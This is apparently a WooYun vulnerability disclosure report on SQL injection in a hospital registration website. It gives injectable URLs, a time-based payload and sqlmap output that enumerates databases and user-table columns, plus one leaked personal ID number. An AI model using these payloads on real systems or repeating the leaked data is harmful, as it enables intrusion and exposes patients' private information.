乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-10: 细节已通知厂商并且等待厂商处理中 2015-12-14: 厂商已经确认,细节仅向厂商公开 2015-12-24: 细节向核心白帽子及相关领域专家公开 2016-01-03: 细节向普通白帽子公开 2016-01-13: 细节向实习白帽子公开 2016-01-28: 细节向公众公开
**.**.**.**
注册时姓名、身份证号、手机号是必填项
注入点:
http://**.**.**.**/zkHospital1.aspx?ID=ZK00000012
http://**.**.**.**/zxDoctorInformation.aspx?ID=6
http://**.**.**.**/zkClassCaseInfo.aspx?ID=1&Hospital=ZK00000001
http://**.**.**.**/zxQuestion.aspx?DoctorID=1
http://**.**.**.**/202/DoctInfo.aspx?ID=346
http://**.**.**.**/Order202.aspx?Dept_Name=
为例:
Payload: ID=ZK00000012';WAITFOR DELAY '0:0:5'-----[09:17:15] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2005[09:17:15] [INFO] testing if current user is DBAcurrent user is DBA: True
Payload: ID=ZK00000012';WAITFOR DELAY '0:0:5'-----[09:09:40] [INFO] testing Microsoft SQL Server[09:09:41] [INFO] confirming Microsoft SQL Server[09:09:43] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NETback-end DBMS: Microsoft SQL Server 2005[09:09:43] [INFO] fetching database names[09:09:43] [INFO] fetching number of databases[09:09:43] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[09:09:43] [INFO] retrieved: 10[09:09:47] [INFO] retrieved: Car[09:09:59] [INFO] retrieved: demo[09:10:20] [INFO] retrieved: master[09:10:48] [INFO] retrieved: model[09:11:17] [INFO] retrieved: msdb[09:11:40] [INFO] retrieved: PLATFORM[09:12:16] [INFO] retrieved: REPAIR[09:12:40] [INFO] retrieved: tempdb[09:13:14] [INFO] retrieved: XLIST[09:13:41] [INFO] retrieved: YYGHavailable databases [10]:[*] Car[*] demo[*] master[*] model[*] msdb[*] PLATFORM[*] REPAIR[*] tempdb[*] XLIST[*] YYGH
reg_user是用户注册表,有125311条记录
Database: YYGH+--------------------------------+---------+| Table | Entries |+--------------------------------+---------+| dbo.IpAddress | 444969 || dbo.money_all | 179048 || dbo.reg_user | 125311 || dbo.Log | 62794 || dbo.R_PREREGISTER | 41798 || dbo.user_reg | 28246 || dbo.money_add | 25609 || dbo.HintDetail | 13686 || dbo.HintDetail | 13686 || dbo.QuestionMoney | 4276 || dbo.QuestionMoney | 4276 || dbo.money_t | 2562 || dbo.YaoFang | 2516 || dbo.DoctTotal | 1018 || dbo.DoctInfo | 800 || dbo.JoinInHospital | 672 || dbo.Memo | 480 || dbo.JoinInAD | 452 || dbo.SX_Save | 331 || dbo.HospitalPaiming | 270 || dbo.ZK_Register | 237 || dbo.LNZY_Log | 193 || dbo.LNZY_String | 193 || dbo.ZK_ClassCase | 135 || dbo.ZK_MediaReport | 134 || dbo.ZK_AuthorityTechnology | 131 || dbo.Code_Area | 129 || dbo.ZK_MedicalEquipment | 122 || dbo.temp | 119 || dbo.LNZY_ScheduleInformation | 118 || dbo.ZK_DoctorInformation | 78 || dbo.MediaReport | 73 || dbo.DiseaseBase | 72 || dbo.DiseaseBase | 72 || dbo.Advice | 43 || dbo.ZK_ImgNews | 40 || dbo.lock_user | 36 || dbo.Code_HosType | 33 || dbo.DeptInfo | 32 || dbo.Code_Professional | 24 || dbo.ZK_HospitalInformation | 21 || dbo.HealthPressure | 20 || dbo.ZK_DepartmentInformation | 20 || dbo.DoctAdvice | 19 || dbo.HospitalHot | 19 || dbo.ZK_Admin | 19 || dbo.ZK_TopicRead | 17 || dbo.SMS | 15 || dbo.Code_ProfessionalType | 14 || dbo.LNZY_DoctorInformation | 14 || dbo.HealthGuide | 13 || dbo.SX_Return | 12 || dbo.SX_Return | 12 || dbo.HospitalRank | 11 || dbo.NewsDynamic | 11 || dbo.NewsDynamic | 11 || dbo.HealthHeart | 10 || dbo.HospitalDynamic | 10 || dbo.HospitalDynamic | 10 || dbo.Code_HosLevel | 9 || dbo.NewsQuestion | 9 || dbo.JIBIE | 8 || dbo.ZK_Flash | 8 || dbo.Code_Education | 7 || dbo.Code_Blood | 6 || dbo.Code_Job | 6 || dbo.Code_Admin | 5 || dbo.LNZY_DepartmentInformation | 5 || dbo.AdminUser | 4 || dbo.Code_Degree | 4 || dbo.Code_Paper | 4 || dbo.Code_Practice | 4 || dbo.Code_RH | 4 || dbo.Code_Sex | 4 || dbo.Code_Arrange | 3 || dbo.Code_DeptLevel | 3 || dbo.Code_DeptLevel | 3 || dbo.Code_Level | 3 || dbo.system32 | 3 || dbo.Health_Lecture | 2 || dbo.Health_Memo | 2 || dbo.Health_Record | 2 || dbo.LNZY_PreRegister | 2 || dbo.ZK_AdHistory | 2 || dbo.ZK_AdHistory | 2 || dbo.AdminHos | 1 || dbo.AdminHos | 1 || dbo.AdminHos | 1 || dbo.Health_Warning | 1 || dbo.HealthLecture | 1 || dbo.HealthWarning | 1 || dbo.SerialNum | 1 |+--------------------------------+---------+
用
http://**.**.**.**/zkClassCaseInfo.aspx?Hospital=ZK00000001&ID=1
跑下数据
Payload: Hospital=ZK00000001';WAITFOR DELAY '0:0:5'--&ID=1---[10:54:04] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2005[10:54:04] [INFO] fetching columns for table 'reg_user' in database 'YYGH'[10:54:04] [INFO] resumed: 25[10:54:04] [INFO] resumed: answer[10:54:04] [INFO] resumed: birthday[10:54:04] [INFO] resumed: email[10:54:04] [INFO] resumed: id[10:54:04] [INFO] resumed: job[10:54:04] [INFO] resumed: money[10:54:04] [INFO] resumed: name[10:54:04] [INFO] resumed: now[10:54:04] [INFO] resumed: oldmoney[10:54:04] [INFO] resumed: password[10:54:04] [INFO] resumed: phone[10:54:04] [INFO] resumed: postcode[10:54:04] [INFO] resumed: question[10:54:04] [INFO] resumed: sex[10:54:04] [INFO] resumed: sf[10:54:04] [INFO] resumed: sh[10:54:04] [INFO] resumed: SMS[10:54:04] [INFO] resumed: tel[10:54:04] [INFO] resumed: tel1[10:54:04] [INFO] resumed: username[10:54:04] [INFO] resumed: vip[10:54:04] [INFO] resumed: vipfy[10:54:04] [INFO] resumed: viptime[10:54:04] [INFO] resumed: WeiXin[10:54:04] [INFO] resumed: ybk[10:54:04] [INFO] fetching entries for table 'reg_user' in database 'YYGH'[10:54:04] [INFO] fetching number of entries for table 'reg_user' in database 'YYGH'[10:54:04] [INFO] resumed: 125484[10:54:04] [INFO] fetching number of distinct values for column 'id'[10:54:04] [INFO] resumed: 125482[10:54:04] [INFO] fetching number of distinct values for column 'sf'[10:54:04] [INFO] resumed: 122102[10:54:04] [INFO] fetching number of distinct values for column 'sh'[10:54:04] [INFO] resumed: 2[10:54:04] [INFO] fetching number of distinct values for column 'SMS'[10:54:04] [INFO] resumed: 2[10:54:04] [INFO] fetching number of distinct values for column 'job'[10:54:04] [INFO] resumed: 49213[10:54:04] [INFO] fetching number of distinct values for column 'now'[10:54:04] [INFO] resumed: 2364[10:54:04] [INFO] fetching number of distinct values for column 'sex'[10:54:04] [INFO] resumed: 2[10:54:04] [INFO] fetching number of distinct values for column 'tel'[10:54:04] [INFO] resumed: 82234[10:54:04] [INFO] fetching number of distinct values for column 'vip'[10:54:04] [INFO] resumed: 2[10:54:04] [INFO] fetching number of distinct values for column 'ybk'[10:54:04] [INFO] resumed: 2[10:54:04] [INFO] fetching number of distinct values for column 'name'[10:54:04] [INFO] resumed: 86120[10:54:04] [INFO] fetching number of distinct values for column 'tel1'[10:54:04] [INFO] resumed: 113967[10:54:04] [INFO] fetching number of distinct values for column 'email'[10:54:04] [INFO] resumed: 26924[10:54:04] [INFO] fetching number of distinct values for column 'money'[10:54:05] [INFO] resumed: 174[10:54:05] [INFO] fetching number of distinct values for column 'phone'[10:54:05] [INFO] resumed: 1[10:54:05] [INFO] fetching number of distinct values for column 'vipfy'[10:54:05] [INFO] resumed: 3[10:54:05] [INFO] fetching number of distinct values for column 'WeiXin'[10:54:05] [INFO] resumed: 2[10:54:05] [INFO] fetching number of distinct values for column 'answer'[10:54:05] [INFO] resumed: 43459[10:54:05] [INFO] fetching number of distinct values for column 'viptime'[10:54:05] [INFO] resumed: 806[10:54:05] [INFO] fetching number of distinct values for column 'birthday'[10:54:05] [INFO] resumed: 24755[10:54:05] [INFO] fetching number of distinct values for column 'oldmoney'[10:54:05] [INFO] resumed: 159[10:54:05] [INFO] fetching number of distinct values for column 'password'[10:54:05] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[10:54:05] [INFO] retrieved: 87403[10:54:30] [INFO] fetching number of distinct values for column 'postcode'[10:54:30] [INFO] retrieved: 3088[10:55:02] [INFO] fetching number of distinct values for column 'question'[10:55:02] [INFO] retrieved: 19866[10:55:35] [INFO] fetching number of distinct values for column 'username'[10:55:35] [INFO] retrieved: 125466[10:56:01] [WARNING] no proper pivot column provided (with unique values). It won't be possible to retrieve all rows[10:56:01] [INFO] retrieved: 10000[10:57:00] [INFO] retrieved: 211223198507210229[10:59:27] [INFO] retrieved: 1[10:59:43] [INFO] retrieved: 0[10:59:55] [INFO] retrieved:
实在太慢了,就到此为止
你们比我更专业
危害等级:中
漏洞Rank:9
确认时间:2015-12-14 17:18
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给辽宁分中心,由辽宁分中心后续协调网站管理单位处置。
暂无